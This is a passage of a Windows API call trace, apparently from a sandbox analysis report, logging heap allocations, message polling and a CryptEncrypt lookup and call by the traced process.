hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0263.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0263.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0263.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0263.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0263.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0x2f16018 [0263.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0263.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0263.967] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0263.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0x2f16018 [0263.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0263.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0x2f3bc88 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0263.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.971] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0263.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0263.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.972] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.973] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0263.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.974] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.974] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.974] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0263.974] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.975] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.975] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0263.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.975] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.975] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.975] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.975] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0263.975] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.976] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.979] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540d0 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.980] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x12e2a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12e30) returned 1 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 